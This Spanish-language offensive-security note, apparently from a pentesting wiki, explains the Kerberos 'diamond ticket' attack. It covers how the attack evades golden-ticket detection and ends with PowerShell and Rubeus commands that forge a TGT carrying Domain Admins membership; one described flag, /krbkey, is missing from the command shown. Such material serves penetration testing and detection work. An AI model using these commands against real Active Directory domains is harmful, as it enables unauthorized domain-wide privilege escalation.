Entrada Diamante

Como un boleto de oro, una entrada diamante es un TGT que se puede utilizar para acceder a cualquier servicio como cualquier usuario. Un boleto de oro se falsifica completamente sin conexión, se cifra con el hash krbtgt de ese dominio y luego se pasa a una sesión de inicio de sesión para su uso. Debido a que los controladores de dominio no rastrean los TGT que han emitido legítimamente, aceptarán felizmente TGT que estén cifrados con su propio hash krbtgt.

Existen dos técnicas comunes para detectar el uso de boletos de oro:

• Buscar TGS-REQs que no tengan un AS-REQ correspondiente.

• Buscar TGT que tengan valores absurdos, como la vida útil predeterminada de 10 años de Mimikatz.

Un boleto diamante se crea modificando los campos de un TGT legítimo que fue emitido por un DC. Esto se logra solicitando un TGT, descifrándolo con el hash krbtgt del dominio, modificando los campos deseados del boleto y luego volviendo a cifrarlo. Esto supera las dos deficiencias mencionadas anteriormente de un boleto de oro porque:

• Los TGS-REQ tendrán un AS-REQ precedente.

• El TGT fue emitido por un DC, lo que significa que tendrá todos los detalles correctos de la política de Kerberos del dominio. Aunque estos pueden ser falsificados con precisión en un boleto de oro, es más complejo y propenso a errores.

# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.